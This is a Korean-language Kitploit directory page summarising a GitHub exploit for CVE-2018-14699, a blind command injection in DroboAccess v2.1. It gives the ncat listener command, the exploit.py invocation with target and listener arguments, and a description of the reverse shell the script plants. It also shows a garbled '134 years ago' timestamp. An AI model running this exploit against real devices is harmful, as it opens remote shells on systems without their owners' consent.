Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2018-14699 — DroboAccess v 2.1의 enable_user 함수에 있는 인증되지 않은 블라인드 명령 주입 | Kitploit
도구/GitHubGitHub/revocain/cve-2018-14699
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubrevocain/cve-2018-14699

CVE-2018-14699

DroboAccess v 2.1의 enable_user 함수에 있는 인증되지 않은 블라인드 명령 주입

저장소 보기
134년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2018-14699

DroboAccess v2.1의 enable_user 함수에서의 인증되지 않은 명령 주입


사용법:

  • 사용하려면 먼저 리스너를 시작하세요 (ncat -nvlp 1337)

  • 그런 다음 익스플로잇을 실행하세요

    • 예시: exploit.py -t 192.168.1.122:8080 -l 192.168.1.2 -p 1337

    '-t', '--target', help='익스플로잇을 위한 호스트, 예: 192.168.1.122:8080',required=True

    '-l', '--listener-ip', help='리스너 IP', required=True

    '-p', '--port', help='리스너의 포트 번호', required=True

설명:

CVE-2018-14699는 DroboAccess v2.1의 블라인드 명령 주입 취약점입니다. 문제는 enable_user 함수가 사용자 이름 매개변수를 사용자 입력으로 받은 후, 셸을 직접 실행하는 의존성을 호출하면서 어떠한 검증도 수행하지 않기 때문입니다. 제가 이를 명확히 하는 이유는 이에 대한 다른 참조가 없는 것으로 보이기 때문입니다. 다시 말해, 이는 Drobo 5N2의 취약점이 아니라 DroboAccess의 취약점입니다. 이는 B810n에서 성공적으로 테스트되었습니다.

세부 사항

스크립트는 현재 작업 디렉토리에 revshell이라는 파일로 스크립트를 에코하려고 시도합니다. 성공하면 bash를 실행 파일로 사용하여 호출하고, bash로 리스너에 다시 연결합니다!

참고 자료:

  • https://blog.securityevaluators.com/call-me-a-doctor-new-vulnerabilities-in-drobo5n2-4f1d885df7fc
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14699
도구 다운로드